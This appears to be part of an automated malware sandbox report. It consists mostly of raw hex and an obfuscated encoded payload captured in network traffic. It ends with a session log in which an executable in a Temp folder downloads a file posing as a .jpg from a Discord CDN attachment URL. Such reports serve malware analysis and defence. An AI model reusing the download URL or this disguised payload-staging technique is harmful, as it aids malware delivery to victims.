20 4f 20 58 4d 20 4f 20 45 6d 20 4f 20 6d 70 20 4f 20 57 45 20 4f 20 58 57 20 4f 20 71 4a 71 20 4f 20
                                                  Data Ascii: JJ O Wm O DW O mp O XW O mp O mp O qJJ O XE O qqW O DD O WO O mM O qOm O qqq O DM O qqJ O MM O Wp O EJ O qOp O WW O XX O qqm O qJO O EE O qJO O Em O EX O EE O qqX O qJJ O XJ O XE O XE O Wp O mp O ME O qOO O qOE O EO O qOW O XM O Em O mp O WE O XW O qJq O
                                                  2021-10-29 18:29:50 UTC1157INData Raw: 44 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 44 20 4f 20 45 45 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 45 45 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 71 71 71 20 4f 20 45 71 20 4f 20 44 45 20 4f 20 44 45 20 4f 20 71 71 57 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 45 45 20 4f 20 45 70 20 4f 20 45 45 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 58 57 20 4f 20 71 4f 4f 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 58 71 20 4f
                                                  Data Ascii: DX O DW O Eq O DW O Xq O EJ O mE O DW O qOp O DM O DW O EE O DD O EE O Eq O DW O mM O XW O qOO O Em O Xq O Xq O EE O EE O DW O qqq O Eq O DE O DE O qqW O Eq O DW O Xq O XW O EO O DD O qqM O EE O Ep O EE O DD O DM O Eq O DW O mM O XW O qOO O Ep O DW O Xq O
                                                  2021-10-29 18:29:50 UTC1160INData Raw: 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 57 20 4f 20 57 44 20 4f 20 58 44 20 4f 20 71 4f 4d 20 4f 20 44 44 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 6d 4d 20 4f 20 71 4f 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 71 71 6d 20 4f 20 4d 45 20 4f 20 45 45 20 4f 20 71 71 6d 20 4f 20 58 71 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 71 71 58 20 4f 20 57 6d 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 6d 4d 20 4f 20 71 71 71 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 45 71 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 4d 4d 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4f 71 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 71 71 58 20 4f 20 58 4d 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 71 4f 4f 20 4f 20 45 57 20 4f 20 6d 58
                                                  Data Ascii: MX O qOE O qqW O WD O XD O qOM O DD O qqX O MX O qJJ O mM O qOE O qqD O qOq O qqm O ME O EE O qqm O Xq O qqq O qqq O qOm O qOE O qqX O Wm O qqq O MX O mM O qqq O qOX O MM O Eq O EW O DD O MM O WO O EX O qOq O qqq O ED O qqX O XM O Wq O EX O qOO O EW O mX
                                                  2021-10-29 18:29:50 UTC1165INData Raw: 20 4d 4d 20 4f 20 6d 4d 20 4f 20 71 4f 4a 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 45 71 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 4f 20 4f 20 57 6d 20 4f 20 71 71 4d 20 4f 20 71 71 4d 20 4f 20 71 4f 57 20 4f 20 71 71 70 20 4f 20 45 4f 20 4f 20 71 4a 4f 20 4f 20 45 6d 20 4f 20 71 71 6d 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 58 70 20 4f 20 45 4d 20 4f 20 45 44 20 4f 20 71 71 4f 20 4f 20 44 57 20 4f 20 4d 4f 20 4f 20 45 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 58 57 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 58 4a 20 4f 20 57 70 20 4f 20 71 4f 4f 20 4f 20 45 4d 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 71 4f 71 20 4f 20 45 57 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 58 4d 20
                                                  Data Ascii: MM O mM O qOJ O DM O WE O Eq O WO O WO O WO O Wm O qqM O qqM O qOW O qqp O EO O qJO O Em O qqm O qqX O qOO O Xp O EM O ED O qqO O DW O MO O EM O Xq O DW O qOO O MX O XW O ME O MM O XJ O Wp O qOO O EM O qqE O DW O XM O qOq O EW O mE O qOO O MM O qqO O XM
                                                  2021-10-29 18:29:50 UTC1169INData Raw: 20 58 57 20 4f 20 57 44 20 4f 20 45 57 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 57 70 20 4f 20 58 4d 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 6d 58 20 4f 20 71 4f 70 20 4f 20 45 44 20 4f 20 45 71 20 4f 20 71 4f 6d 20 4f 20 71 4f 44 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 45 6d 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 71 4f 45 20 4f 20 58 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 45 4a 20 4f 20 6d 4d 20 4f 20 71 71 45 20 4f 20 45 4a 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4a 71 20 4f 20 58 6d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 4a 4a 20 4f 20 45 58 20 4f 20 6d 58 20 4f 20 4d 4f 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 58 4a 20 4f 20 45 71 20 4f 20 57 4a 20 4f 20 44 45 20 4f 20 44 44 20 4f 20 58 70 20 4f 20 71 4f 4a 20
                                                  Data Ascii: XW O WD O EW O mp O EW O DD O Wp O XM O qOD O qOO O mX O qOp O ED O Eq O qOm O qOD O WE O EO O Em O qqW O DW O qOE O XE O qOJ O qOp O EJ O mM O qqE O EJ O qOJ O qqX O qJq O Xm O MX O MX O qJJ O EX O mX O MO O ME O qqX O XJ O Eq O WJ O DE O DD O Xp O qOJ
                                                  2021-10-29 18:29:50 UTC1173INData Raw: 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 4f 4a 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4a 4a 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 70 20 4f 20 71 4f 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 4f 58 20 4f 20 71 4f 6d 20 4f 20 71 4a 4a 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 71 71 45 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 4a 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 4d 4d 20 4f 20 71 4a 4a 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f
                                                  Data Ascii: O qqp O pE O qqO O pE O qqW O qOX O qOM O qOJ O qOJ O qJq O pE O qOO O pE O ME O qJJ O qOm O pE O qp O qO O pE O qqM O qOX O qOm O qJJ O qOD O qOm O qJO O qqE O qJJ O pE O qqW O pE O qJJ O qqE O qOW O MM O qJJ O qqp O qqm O qqp O ME O qqX O pE O MM O pE O
                                                  2021-10-29 18:29:50 UTC1177INData Raw: 71 71 6d 20 4f 20 71 4f 6d 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 4d 58 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 6d 20 4f 20 71 4f 57 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 44 20 4f 20 71 4f 70 20 4f 20 71 4f 44 20 4f 20 71 4f 44 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 4f 4f 20 4f 20 4d 45 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 71 4f 4d 20 4f 20 71 4f 58 20 4f 20 71 4f 57 20
                                                  Data Ascii: qqm O qOm O qOm O pE O qqO O pE O qqq O MX O qOX O MX O qqJ O qqq O qOq O qOD O qqO O pE O qqW O pE O qOm O qOW O qOO O pE O qOq O pE O qqD O qqm O qqD O qOp O qOD O qOD O qOM O MX O qOD O qOO O ME O qOJ O qqX O qOJ O pE O pJ O pE O qOW O qOM O qOX O qOW
                                                  2021-10-29 18:29:50 UTC1181INData Raw: 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 71 6d 20 4f 20 71 4f 71 20 4f 20 4d 4d 20 4f 20 71 71 44 20 4f 20 71 71 4f 20 4f 20 71 4f 6d 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 70 20 4f 20 71 4f 71 20 4f 20 71 4a 71 20 4f 20 71 4f 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 4d 20 4f 20 71 4f 44 20 4f 20 71 4f
                                                  Data Ascii: O qOX O qqW O qJJ O pE O qqW O pE O qqp O qqm O qOq O MM O qqD O qqO O qOm O MM O pE O ME O pE O qqM O qqE O qJO O qOq O qOm O pE O MX O pE O qOO O qqp O qOq O qJq O qOm O qqO O qOX O qqJ O pE O qOX O pE O MX O qOM O MX O qOX O qJJ O qqJ O qOM O qOD O qO
                                                  2021-10-29 18:29:50 UTC1185INData Raw: 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 4f 4f 20 4f 20 4d 58 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 57 20 4f 20 71 71 4f 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 71 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 58 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 71 44 20 4f 20 71 4f 58 20 4f 20 71 71 4f 20 4f 20 71 71 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4d 20 4f 20 71 4a 4a 20 4f 20 71 4f 57 20 4f 20 71 4f 6d 20 4f 20 71 71
                                                  Data Ascii: J O qOm O qOE O MX O qOO O MX O qOD O qqE O qOW O qqO O qOJ O qJq O MX O MX O pE O qOq O pE O qqD O qOq O MX O qOm O qOX O qJO O pE O qOO O pE O qqq O qqX O ME O pE O qOW O pE O qqD O qqD O qOX O qqO O qqp O pE O MM O pE O qOO O qqM O qJJ O qOW O qOm O qq
                                                  2021-10-29 18:29:50 UTC1189INData Raw: 71 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 71 4f 6d 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 4f 4f 20 4f 20 71 4f 4d 20 4f 20 71 71 70 20 4f 20 71 71 44 20 4f 20 71 4f 4a 20 4f 20 4d 45 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 71 71 71 20 4f 20 71 71 57 20 4f 20 71 4f 4f 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 4d 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 71 4a 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 45 20 4f 20 71 4a 71 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 71 71 44 20 4f 20 71 4a 4a 20 4f 20 71 4a 4a
                                                  Data Ascii: qq O qOO O qOq O qOm O qJO O pE O qOq O pE O qJq O qOO O qOM O qqp O qqD O qOJ O ME O MM O qqJ O pE O ME O pE O qqq O qqq O qqW O qOO O qqW O MX O qOM O MX O qOE O qqM O qJO O qOM O qOO O qqX O pE O qOX O pE O qJO O qOE O qJq O qJO O qOp O qqD O qJJ O qJJ
                                                  2021-10-29 18:29:50 UTC1192INData Raw: 20 71 4f 71 20 4f 20 71 4f 45 20 4f 20 71 71 71 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 70 45 20 4f 20 4d 45 20 4f 20 71 4f 4d 20 4f 20 71 4a 71 20 4f 20 71 71 4a 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4a 4a 20 4f 20 71 71 71 20 4f 20 71 4f 71 20 4f 20 70 45 20 4f 20 44 71 20 4f 20 70 45 20 4f 20 71 4a 4f 20 4f 20 4d 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 71 71 45 20 4f 20 71 71 45 20 4f 20 70 45 20 4f 20 70 4a 20 4f 20 70 45 20 4f 20 71 71 4d 20 4f 20 71 71 70 20 4f 20 71 4f 4d 20 4f 20 71 71 4a 20 4f 20 71 71 4d 20 4f 20 71 71 58 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 70 20 4f 20 71 4f 6d 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 71 57 20 4f 20 4d 45 20 4f 20 71 4f 6d
                                                  Data Ascii: qOq O qOE O qqq O qJJ O qqq O pE O qqD O pE O ME O qOM O qJq O qqJ O qOm O qOO O qJJ O qqq O qOq O pE O Dq O pE O qJO O ME O qJO O qOO O qqE O qqE O pE O pJ O pE O qqM O qqp O qOM O qqJ O qqM O qqX O pE O qOO O pE O qqp O qOm O qOX O qOM O qqW O ME O qOm
                                                  2021-10-29 18:29:50 UTC1197INData Raw: 71 58 20 4f 20 71 4f 44 20 4f 20 71 71 6d 20 4f 20 71 71 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 71 44 20 4f 20 71 4f 44 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4f 20 4f 20 71 4f 58 20 4f 20 71 71 6d 20 4f 20 71 4a 71 20 4f 20 71 4f 4a 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 71 4f 70 20 4f 20 4d 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4a 71 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 71 71 57 20 4f 20 71 4f 58 20 4f 20 71 71 57 20 4f 20 71 4f 45 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 70 45 20
                                                  Data Ascii: qX O qOD O qqm O qqM O qOO O qOW O qOp O qJq O pE O qqW O pE O qqD O qOD O qqM O MM O qqO O qOX O qqm O qJq O qOJ O qqJ O qqq O qOJ O pE O MM O pE O qOJ O qOp O MX O qqX O qOO O pE O qqW O pE O qJq O qqM O MX O qqW O qOX O qqW O qOE O MX O qqO O qqm O pE
                                                  2021-10-29 18:29:50 UTC1201INData Raw: 20 4f 20 4d 4d 20 4f 20 70 45 20 4f 20 71 4f 4d 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 71 44 20 4f 20 71 71 57 20 4f 20 71 71 6d 20 4f 20 4d 58 20 4f 20 4d 45 20 4f 20 71 4f 4f 20 4f 20 70 45 20 4f 20 71 71 71 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 71 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 44 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f 20 71 71 57 20 4f 20 71 4a 4f 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 71 4a 4f 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 71 58 20 4f 20 71 4f 45 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 71 4a 20 4f 20 71 4a 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 70 45 20
                                                  Data Ascii: O MM O pE O qOM O qOE O qOX O qqD O qqW O qqm O MX O ME O qOO O pE O qqq O pE O qOX O qqE O qJO O qOD O MM O qOJ O qqW O qJO O qqD O qqm O qqq O qJO O pE O qqO O pE O qqX O qOE O qqM O MX O MX O qqM O MM O qqJ O qJJ O pE O qOJ O pE O MX O qOJ O qOO O pE
                                                  2021-10-29 18:29:50 UTC1205INData Raw: 4d 20 4f 20 4d 4d 20 4f 20 71 4f 57 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 57 20 4f 20 71 71 45 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 71 71 71 20 4f 20 4d 45 20 4f 20 4d 45 20 4f 20 71 4f 71 20 4f 20 4d 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 4f 70 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 57 20 4f 20 71 4f 70 20 4f 20 71 4f 4d 20 4f 20 70 45 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f
                                                  Data Ascii: M O MM O qOW O qOq O qqW O qqJ O qOp O qqO O qOW O qqE O qqW O qOJ O pE O qOJ O pE O qOO O qqJ O qqW O MX O qqO O qqq O ME O ME O qOq O ME O qOW O pE O qOW O pE O qqm O qqO O qOE O qOX O qOp O qqO O qOM O qOp O qOW O qOp O qOM O pE O qOp O pE O MM O qOJ O
                                                  2021-10-29 18:29:50 UTC1209INData Raw: 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 58 20 4f 20 71 71 4a 20 4f 20 71 71 71 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20 71 4f 58 20 4f 20 71 4a 4f 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 71 4a 71 20 4f 20 70 45 20 4f 20 71 4f 4a 20 4f 20 70 45 20 4f 20 71 71 45 20 4f 20 71 71 4a 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 4d 45 20 4f 20 71 4a 4f 20 4f 20 71 71 4d 20 4f 20 71 4f 45 20 4f 20 4d 45 20 4f 20 71 4f 4a 20 4f 20 71 71 4f 20 4f 20 71 4f 4f 20 4f 20 71 4a 4f 20 4f 20 71 71 4f 20 4f 20 70 45 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 71 4f 58 20 4f 20 71 4f 45 20 4f 20 71 4f 57 20 4f 20 71 4a 71 20 4f 20 4d 45 20 4f 20 71 4f 70 20 4f 20 71 71 71 20 4f 20 71 4f 70
                                                  Data Ascii: E O qOX O qOE O qOX O qqJ O qqq O qqX O qOq O qOX O qJO O qOW O pE O qqO O pE O qOO O qOJ O qJq O pE O qOJ O pE O qqE O qqJ O qqM O MX O ME O qJO O qqM O qOE O ME O qOJ O qqO O qOO O qJO O qqO O pE O qOW O pE O qOX O qOE O qOW O qJq O ME O qOp O qqq O qOp
                                                  2021-10-29 18:29:50 UTC1213INData Raw: 70 45 20 4f 20 71 71 57 20 4f 20 70 45 20 4f 20 71 4f 44 20 4f 20 71 71 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 57 20 4f 20 70 45 20 4f 20 4d 4a 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 4d 58 20 4f 20 71 4f 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 71 6d 20 4f 20 71 4f 4f 20 4f 20 71 4f 70 20 4f 20 70 45 20 4f 20 71 70 20 4f 20 71 4f 20 4f 20 70 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 71 71 4a 20 4f 20 70 45 20 4f 20 58 4a 20 4f 20 70 45 20 4f 20 71 4f 6d 20 4f 20 71 71 57 20 4f 20 71 4f 44 20 4f 20 71 4f 6d 20 4f 20 71 71 58 20 4f 20 71 4f 58 20 4f 20 71 4f 4a 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4a 71 20
                                                  Data Ascii: pE O qqW O pE O qOD O qqE O qOO O qOD O qOW O pE O MJ O pE O qOO O qOD O qOm O qOO O qOJ O MX O qOX O qJJ O qOO O qOD O qqm O qOO O qOp O pE O qp O qO O pE O qOO O qOJ O qOO O qqJ O pE O XJ O pE O qOm O qqW O qOD O qOm O qqX O qOX O qOJ O qqX O qOO O qJq
                                                  2021-10-29 18:29:50 UTC1229INData Raw: 4f 20 57 44 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 57 4f 20 4f 20 44 44 20 4f 20 44 4d 20 4f 20 6d 4d 20 4f 20 6d 58 20 4f 20 57 71 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 71 4a 57 20 4f 20 4d 4a 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 71 20 4a 71 20 44 58 20 4f 20 71 71 6d 20 4f 20 71 4f 57 20 4f 20 71 71 58 20 4f 20 71 4f 71 20 4f 20 71 71 6d 20 4f 20 44 58 20 4f 20 71 4f 71 20 4f 20 71 71 57 20 4f 20 4d 4d 20 4f 20 4f 20 71 4a 58 20 71 45 57 20 58 70 20 4f 20 58 4d 20 4f 20 58 70 20 4f 20 58 6d 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 4d 4a 20 4f 20 44 45 20 4f 20 71 71 71 20 4f 20 71 71 4f 20 4f 20 71 71 44 20 4f 20 71 71 6d 20 4f 20 71 71 71 20 4f 20 71 4f 58 20 4f 20 58 70 20 4f 20 71 4f 71 20 4f 20 71 71 44 20 4f 20 6d 58
                                                  Data Ascii: O WD O mX O mX O WO O DD O DM O mM O mX O Wq O mM O WD O qJW O MJ O mX O mX O mX O mX O q Jq DX O qqm O qOW O qqX O qOq O qqm O DX O qOq O qqW O MM O O qJX qEW Xp O XM O Xp O Xm O DM O EE O MJ O DE O qqq O qqO O qqD O qqm O qqq O qOX O Xp O qOq O qqD O mX
                                                  2021-10-29 18:29:50 UTC1241INData Raw: 4a 20 6d 20 4a 57 4f 20 4f 20 4f 20 71 4d 4a 20 6d 20 71 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 70 71 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4a 20 71 20 4f 20 71 4d 4a 20 6d 20 70 70 20 71 20 4f 20 71 4d 4a 20 6d 20 70 6d 20 71 20 4f 20 71 4d 4a 20 6d 20 70 57 20 71 20 4f 20 71 4d 4a 20 6d 20 70 44 20 71 20 4f 20 71 4d 4a 20 6d 20 70 45 20 71 20 4f 20 71 4d 4a 20 6d 20 70 58 20 71 20 4f 20 71 4d 4a 20 6d 20 70 4d 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 4f 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 71 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 4a 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 70 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 6d 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 57 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 44 20 71 20 4f 20 71 4d 4a 20 6d 20 6d 45 20
                                                  Data Ascii: J m JWO O O qMJ m qO q O qMJ m pO q O qMJ m pq q O qMJ m pJ q O qMJ m pp q O qMJ m pm q O qMJ m pW q O qMJ m pD q O qMJ m pE q O qMJ m pX q O qMJ m pM q O qMJ m mO q O qMJ m mq q O qMJ m mJ q O qMJ m mp q O qMJ m mm q O qMJ m mW q O qMJ m mD q O qMJ m mE


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.749778162.159.129.233443C:\Users\user\AppData\Local\Temp\C1B2.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-10-29 18:29:53 UTC1254OUTGET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2021-10-29 18:29:53 UTC1254INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:29:53 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 406075
                                                  Connection: close
                                                  CF-Ray: 6a5e78cf19134eb6-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 1984
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "4be3e6f4d4f4aa1116f6c74f532cbeb7"
                                                  Expires: Sat, 29 Oct 2022 18:29:53 GMT
                                                  Last-Modified: Fri, 29 Oct 2021 17:49:11 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1635529751768404
                                                  x-goog-hash: crc32c=bHQJMA==
                                                  x-goog-hash: md5=S+Pm9NT0qhEW9sdPUyy+tw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 406075
                                                  X-GUploader-UploadID: ADPycdtQMHGyEhnppJ8P837WdZk3TFi4GDGE6cytjZ9NP8ck3B0QplKsdro4zTxd-YyGcioOy6QRjSQ8JvbrhdjjkmE
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
